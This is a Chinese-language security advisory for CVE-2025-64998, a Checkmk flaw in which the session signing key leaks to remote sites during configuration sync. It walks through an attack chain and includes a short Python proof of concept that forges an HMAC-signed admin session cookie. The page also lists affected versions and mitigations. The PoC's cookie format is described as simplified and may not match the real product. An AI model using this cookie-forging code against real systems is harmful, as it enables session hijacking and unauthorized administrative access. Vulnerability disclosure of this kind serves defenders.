CVE-2025-64998 CVSS 7.2 高危

CVE-2025-64998 Checkmk 会话签名密钥泄露漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64998

漏洞类型

会话劫持

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Checkmk

漏洞概述

该漏洞存在于Checkmk特定版本中，源于会话签名密钥的意外泄露。在启用了配置同步的场景下，拥有远程站点管理员权限的攻击者，可利用泄露的密钥伪造有效的会话Cookie。这使得攻击者能够成功劫持中心站点的用户会话，从而非法访问敏感数据或执行未授权操作，对系统安全性构成严重威胁。

技术细节

该漏洞的核心在于Checkmk配置同步机制中未能妥善保护会话签名密钥。在分布式监控环境中，中心站点与远程站点同步配置时，本应保密的会话签名密钥被传输至远程站点。由于远程站点的管理员拥有对该站点数据的完全访问权（PR:H），攻击者可以从同步文件或配置存储中提取该密钥。获取密钥后，攻击者能够利用相同的签名算法伪造针对中心站点的有效会话Cookie。由于中心站点仅校验Cookie签名的有效性，攻击者无需知道用户密码即可通过身份验证，完全接管管理员会话，实现机密性、完整性和可用性的全面破坏。

攻击链分析

STEP 1

侦察

识别目标Checkmk架构，确认存在中心站点与远程站点，且配置同步功能已启用。

STEP 2

权限获取

获取远程站点的管理员权限（高权限要求）。

STEP 3

密钥窃取

利用远程站点管理员权限，访问配置同步数据或相关文件，提取中心站点的会话签名密钥。

STEP 4

Cookie伪造

利用窃取的密钥和签名算法，伪造用于中心站点的管理员身份Cookie。

STEP 5

会话劫持

发送包含伪造Cookie的HTTP请求至中心站点，绕过身份验证，接管管理员会话。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2025-64998: Checkmk Session Hijacking via Secret Leakage
import hmac
import hashlib
import base64

# Leaked session signing key obtained from remote site configuration
LEAKED_SECRET = "LEAKED_SECRET_VALUE_HERE"

def forge_cookie(user_id, timestamp):
    # Construct the cookie payload (simplified structure)
    payload = f"{user_id}:{timestamp}"
    # Sign the payload using the leaked secret
    signature = hmac.new(LEAKED_SECRET.encode(), payload.encode(), hashlib.sha256).digest()
    # Base64 encode the signature
    b64_signature = base64.b64encode(signature).decode()
    return f"{payload}:{b64_signature}"

if __name__ == "__main__":
    # Example: Forge a session for admin user
    forged_cookie = forge_cookie("admin", "1710000000")
    print(f"Forged Cookie: _auth={forged_cookie}")
    print("Send this cookie in the HTTP header to hijack the session.")

影响范围

Checkmk < 2.4.0p23

Checkmk < 2.3.0p45

Checkmk 2.2.0

防御指南

临时缓解措施

如果不能立即升级，建议严格审查并限制远程站点管理员账户的权限，并监控中心站点是否存在来自异常IP或时间点的会话活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-64998
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-64998
3 Details https://www.cvedetails.com/cve/CVE-2025-64998/
4 VulDB https://vuldb.com/cve/CVE-2025-64998
5 Link https://checkmk.com/werk/18954

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表